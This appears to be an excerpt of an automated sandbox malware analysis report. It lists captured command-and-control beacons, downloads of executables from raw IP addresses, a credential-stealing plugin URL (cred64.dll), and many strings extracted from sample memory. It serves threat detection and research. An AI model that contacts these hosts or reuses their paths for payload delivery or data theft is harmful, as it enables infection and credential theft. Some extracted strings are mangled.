Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxihacbmgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upkkyf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgusiwjl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulciihlbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjtfrvl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvydl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtmdotimkr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsqxoged.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahgwjjm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efngjyqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukkwrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebaxoe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqghptenl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ptpfdpcirh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etebl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aexqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aehnv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbybhia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhkewyoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqfbhqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acxiqgb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xawdohy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvlvsvw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jorxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syohyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: o36fafs3sn6xou.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbmlqnw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: o36fafs3sn6xou.com
Connects to a URL shortener service
Source: C:\Windows\explorer.exe DNS query: name: u.to
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOOLS-ASiToolsJSCMN ITOOLS-ASiToolsJSCMN
Source: Joe Sandbox View ASN Name: UTA-ASAT UTA-ASAT
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.96.151.51 195.96.151.51
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://116.202.2.1:80
Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://116.202.2.1:80checkmyprofileonthispage0;open_open
Source: 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101/1148
Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101/659169136515.zip:bV
Source: 86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101:80
Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://116.202.5.101:80/659169136515.zip
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/=0&pc=065367&un=user&dm=&av=13&lv=0&og=0tK
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/U8eZkQ0Y1ZtSx2oLs
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dll
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllM
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllal
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming
Source: rovwer.exe, 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE
Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php%J.J
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php)M
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php1J
Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php2142d
Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php27
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php5M
Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php6e2227
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php=J
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.578032701.00000000039D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1
Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=12
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpIM
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpUM
Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpded
Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpodedt
Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpqM
Source: rovwer.exe, 0000000F.00000002.558304896.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://2w3.56.146.174/g84kvj4jck/index.php
Source: 453D.exe, 0000000E.00000002.559563601.00000000007F4000.00000040.00000800.00020000.00000000.sdmp String found in binary or memory: http://2w3ke1f81kujb1ErHJ396kFeJh2wGw.kGPoaj9K4sgjD4aiTghsRtuXhqvbvjv8V7st4eO9BqNG3yXvEhExEI86ToM3BF
Source: 816F.exe, 0000001A.00000002.572240339.000000000255C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.70
Source: 816F.exe, 0000001A.00000002.564423436.0000000002508000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.70/Wavafursq.jpeg
Source: 816F.exe, 0000001A.00000002.541785354.0000000000889000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.70/Wavafursq.jpeg&BKl:
Source: 816F.exe, 0000001A.00000002.574232042.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.213.50.704
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.://svedbergbryanthusnonarithmetical.com/v6/down/argq.exe
Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.476668065.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: 86EE.exe, 0000002D.00000003.493388145.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.487579395.0000000001520000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492244147.0000000001520000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.488488478.0000000001521000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://o36fafs3sn6xou./1148
Source: explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://o36fafs3sn6xou.com/
Source: explorer.exe, 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000000.448635710.0000000000950000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000028.00000002.522890770.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000002C.00000002.523503696.0000000000810000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000000.454736835.00000000003E0000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://o36fafs3sn6xou.com/Mozilla/5.0
Source: 453D.exe.1.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 453D.exe.1.dr String found in binary or memory: http://s.symcd.com06
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
